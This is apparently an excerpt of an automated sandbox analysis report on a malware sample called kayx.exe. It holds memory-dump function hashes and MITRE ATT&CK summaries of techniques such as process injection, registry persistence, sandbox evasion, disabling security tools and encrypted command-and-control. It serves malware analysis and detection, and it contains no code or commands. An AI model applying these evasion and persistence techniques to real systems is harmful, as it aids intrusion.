Instruction ID: 3543c596221652841ebd71c00a6e49c21f19b95fc3db7ee37826b0a0ea1fe631
Opcode Fuzzy Hash: 2a9d7f791672425e2889eea9473c2fc4612057565b38bd34c802b812c8c7b75a
Instruction Fuzzy Hash: C911E131608250CFD704DB6AC941ABD7BBAAFC0204B058855D283EBAA5EF78AD45C761

Uniqueness

Uniqueness Score: -1.00%

Function 01060890, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1441ed67b99cc3e4cdea533add6794b5b90e5d451fd79f641f43e05e40478ee0
Instruction ID: 9fb92cb9ae78311d9d1f1ca8b7736f23d8ff302b50da1561e7341543ee714348
Opcode Fuzzy Hash: 1441ed67b99cc3e4cdea533add6794b5b90e5d451fd79f641f43e05e40478ee0
Instruction Fuzzy Hash: 0E118B74A90209DFEB41DFA8D894AAEBBF6FF48310F248459E451EB364D7309941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01061CAF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed147a18c89a304dfb8c652c1edb642d05711e035ad63f179915e43ae8fd071
Instruction ID: d1487c5f6cce46af74ae0c90304693da3d01a1fe05667325fba0e1e5ebdcea26
Opcode Fuzzy Hash: fed147a18c89a304dfb8c652c1edb642d05711e035ad63f179915e43ae8fd071
Instruction Fuzzy Hash: 2F110871108B82CFC321EF28DC65755BBF0EF91305F044A6DC1968B6E6D778E8499B91

Uniqueness

Uniqueness Score: -1.00%

Function 01060905, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697ae8a0b73ae16605484a3449c931d173858e2ccc9552216d30b0222be587c3
Instruction ID: eb2e41fa21b8396aaa63aa82cc6fe16a4df947d541ba09fad4782f3fe5d06858
Opcode Fuzzy Hash: 697ae8a0b73ae16605484a3449c931d173858e2ccc9552216d30b0222be587c3
Instruction Fuzzy Hash: DB11E674E51209DFDB40DFA8D994AADBBF6BF48310F248469E451EB328D7309941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01060720, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b007b9e47e85ecb6684af0085bb885a9235bdea0ca99e83dc1bf34f0b666bc2e
Instruction ID: d611db8c0923568c348712b2e2d26e00f1255c2ff3baae9f89b077778a8e276f
Opcode Fuzzy Hash: b007b9e47e85ecb6684af0085bb885a9235bdea0ca99e83dc1bf34f0b666bc2e
Instruction Fuzzy Hash: EE01DC39B88200DF9318AA2AA99487D72DEFF846943000476B587CB31DDE2C9D008E62

Uniqueness

Uniqueness Score: -1.00%

Function 01060640, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df08e691a47f5936f0fcf20274826b4f947c30531479a0d9e78438c86a29995
Instruction ID: ccef7541cad0a6b79ba399a1ae9c12271b4e7cb14a9a503905a10fb922934a98
Opcode Fuzzy Hash: 9df08e691a47f5936f0fcf20274826b4f947c30531479a0d9e78438c86a29995
Instruction Fuzzy Hash: 9201AD3518D280DFC34A6B24AD5487C3B2EA9CD14433544A7F1C7CB6AEE6724C068763

Uniqueness

Uniqueness Score: -1.00%

Function 01061CDC, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2792b4718fb7b8ad75d309299427484f356a5858b6919756788ae25410d24c5f
Instruction ID: 3ad21bb1bb6775d94b80d19c8d4f4b858e0fc62f469e5da22fe1819e4a173bcf
Opcode Fuzzy Hash: 2792b4718fb7b8ad75d309299427484f356a5858b6919756788ae25410d24c5f
Instruction Fuzzy Hash: C3112271208B418FD321EF28ED507AA77B2EFD0304F044D2CD1868BBA1D779E94A9B81

Uniqueness

Uniqueness Score: -1.00%

Function 01061944, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc9399dcdea7596856a67fb650053f3ca9e35c7bae782b57b73d926e3744eeea
Instruction ID: c396faf55a69b079b65eac971fc3eaa57a2764c99dbe961bb70d67d3408dc715
Opcode Fuzzy Hash: fc9399dcdea7596856a67fb650053f3ca9e35c7bae782b57b73d926e3744eeea
Instruction Fuzzy Hash: 31014930A4C209DFDB518F56C554AFEBBFDABC8345F1040AAD0C3AA1A1C77189028BB2

Uniqueness

Uniqueness Score: -1.00%

Function 010605E0, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5967897fc956bf003d0b797fc3d2f0bd3e1eff4ae0e012d29c43c34b7aed5045
Instruction ID: 0dacbb16ecb00d94cc26723ac9dc828ddcad364c26fc2a33e14c8ae8cd2ebd64
Opcode Fuzzy Hash: 5967897fc956bf003d0b797fc3d2f0bd3e1eff4ae0e012d29c43c34b7aed5045
Instruction Fuzzy Hash: D8F082316DD221CB4629663C85201BF72DC978C25472105A7F4C7DB74DD6A1CD00CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 010605CF, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e2deea7de6d20183cf3811f02d0f666098d5db7fc0e550561fe9c80a5b95a6
Instruction ID: 34db549d683a01de4bf4cfa09381836d118fdcd719c04342765d2d787419fc40
Opcode Fuzzy Hash: c3e2deea7de6d20183cf3811f02d0f666098d5db7fc0e550561fe9c80a5b95a6
Instruction Fuzzy Hash: B8F05E715CE251CFC726663891304BF7BAC498A24472544AFF4C78B65AD2258D46CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 01060650, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2b3436edff2651bd311dc123b81aad698d3ad3fe901424a16a455d5ec02595
Instruction ID: 69ebec63892ce99d9f39ae08e06c7efe52be8da31ae90717742d7ae54206f933
Opcode Fuzzy Hash: 3f2b3436edff2651bd311dc123b81aad698d3ad3fe901424a16a455d5ec02595
Instruction Fuzzy Hash: DCF05E352DC250DB828A6B19AE44C3D736EA6CC6543344867F2C7D765CEB725C014763

Uniqueness

Uniqueness Score: -1.00%

Function 01061961, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c090c9748a87d9610ca47e911a211e7a5ea748562fd251a1e8c9c50c90f2865c
Instruction ID: 0751f4f2f72704653a13edda4e86b0862bdef37f35af78dc6f97beb06319bbf8
Opcode Fuzzy Hash: c090c9748a87d9610ca47e911a211e7a5ea748562fd251a1e8c9c50c90f2865c
Instruction Fuzzy Hash: 41F0FC3120C7C05FC300E765DD926C57BA2AF85314704C9BCD2558F957DB75AC059BE1

Uniqueness

Uniqueness Score: -1.00%

Function 01063B70, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6a0560fb9b18e42689ee234d67f4d3036508124f68ba401cd580436a3e6918
Instruction ID: 105fae99a5bc0a1ec96ee6b0e9c882d2ecb7c0f5f3a59aa6e55bafd8a7a84ef9
Opcode Fuzzy Hash: fe6a0560fb9b18e42689ee234d67f4d3036508124f68ba401cd580436a3e6918
Instruction Fuzzy Hash: D3F0827920D591DF8306E625A42587DBBADBE42350301659AD3CBCFAA1D7A04C018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 01063B80, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b96110915f0165133a129789d58d40b2b283f3d593fe2aab95834a98435ab8d
Instruction ID: 0fc6cfdcdbfd419f0f6d6e696ad8227225bf3cbfb995538d1dd42cb2e33168f7
Opcode Fuzzy Hash: 4b96110915f0165133a129789d58d40b2b283f3d593fe2aab95834a98435ab8d
Instruction Fuzzy Hash: F6E01A3520C414DF8244EA59E55597DB3ADFF46764300746AE38F8FAA4EAB19C008BD2

Uniqueness

Uniqueness Score: -1.00%

Function 010606C1, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ce0970750e5b0a1cca438506d3fa81a081d41f4ebc92d5d7e54c5adf7ffe940
Instruction ID: 51a15051e47fa1988b2345970d634eeb29ff44f025ad1723bfbc9f6c3be9ca45
Opcode Fuzzy Hash: 0ce0970750e5b0a1cca438506d3fa81a081d41f4ebc92d5d7e54c5adf7ffe940
Instruction Fuzzy Hash: EBF0653928D194DFC3498B68E95986E3FB95FCD24032541D6F487CB6BAD5704C058B51

Uniqueness

Uniqueness Score: -1.00%

Function 010606D0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c9ec417ee9df194d6af1e8d9874a24fe19bb62af2648021f37bac54267557c
Instruction ID: 2b89160a2ff94f21f3968c983ede9d2e4162a40e69746826e7fe015ce07a22cd
Opcode Fuzzy Hash: a5c9ec417ee9df194d6af1e8d9874a24fe19bb62af2648021f37bac54267557c
Instruction Fuzzy Hash: B0E0463928C114EF82489B68E50882E77BEABCC6513304095F14BCB368DA719C008B90

Uniqueness

Uniqueness Score: -1.00%

Function 01060599, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d51b768beeac98c29ce3198d0de1a40bc9ab7dbeb8b6c439cdc0c1cacb0bd2
Instruction ID: 28a5ea4dbb7f87099929e26d2485f5fdde714889f7e5fff91a4f1f0978e481b5
Opcode Fuzzy Hash: e6d51b768beeac98c29ce3198d0de1a40bc9ab7dbeb8b6c439cdc0c1cacb0bd2
Instruction Fuzzy Hash: D5E04C3058E1888FC3065774EE3F86D3F749992201346519AF0C6CB872D9691947AB25

Uniqueness

Uniqueness Score: -1.00%

Function 01060469, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec99a9c478797680db5113acb5824be055a32017ae2e2f8a0707313544604ea
Instruction ID: 30f052f8e450ed996806656a96dbde7c636f1265f90b9f59f729ff8a89e2987f
Opcode Fuzzy Hash: 2ec99a9c478797680db5113acb5824be055a32017ae2e2f8a0707313544604ea
Instruction Fuzzy Hash: DAD022E1E8A2098ECB006B759E1BA6A7FB08B00100B4242A8E887CB900E82880074F80

Uniqueness

Uniqueness Score: -1.00%

Function 010605A8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 778a6c9b1e06f21d865b97c53c1868556465375bdfd4b27f64ad10143696b43c
Instruction ID: 651a6b81435e4087e9448f8129356b46dcd51e460b91f3dd6657ad120f7f1008
Opcode Fuzzy Hash: 778a6c9b1e06f21d865b97c53c1868556465375bdfd4b27f64ad10143696b43c
Instruction Fuzzy Hash: 6CC0023418514CCBC2047B70FF2F92E7B6CAA403023411120F49783435AE397C95AB59

Uniqueness

Uniqueness Score: -1.00%

Function 01060C0B, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07273b2a5e6f882ef90f0f77d4b414dd2270357c8b9de2e0d87bcff04866d88b
Instruction ID: 7f04d11062362ceaf02704c4c7784fa903c458bab5a0d45556af5acbd4d192af
Opcode Fuzzy Hash: 07273b2a5e6f882ef90f0f77d4b414dd2270357c8b9de2e0d87bcff04866d88b
Instruction Fuzzy Hash: E3C08030448315CFD7048735CC564593770AE0926030548D0FC429F259DB301414E710

Uniqueness

Uniqueness Score: -1.00%

Function 01060448, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0bd019eaf9d852c29a8b9190ec79e761501ae9cbdfbce59b329b8b410a03849
Instruction ID: 3089a5d38cf424ff73c131701c31b9329e674918c439ba89437514d797d0ea10
Opcode Fuzzy Hash: a0bd019eaf9d852c29a8b9190ec79e761501ae9cbdfbce59b329b8b410a03849
Instruction Fuzzy Hash: 0FC092F00CD14DCF82292B907E2EB3D36ECE5406013014041F18F4282D9E61AC645663

Uniqueness

Uniqueness Score: -1.00%

Function 01060478, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40a99ad94f01b3faa9f20403db1cd7bc7e8b0dae5fa2bb0589772d55de23d82
Instruction ID: a142724f659f5a30a3f7dc3de7a525a7b39fd5a61fd6d630142e2340fe4338c8
Opcode Fuzzy Hash: c40a99ad94f01b3faa9f20403db1cd7bc7e8b0dae5fa2bb0589772d55de23d82
Instruction Fuzzy Hash: DDC09BB0D4520C5B87507BB9590A51BB7FC9640105F4145F5DC49C7105FD35D9114BD1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report kayx.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre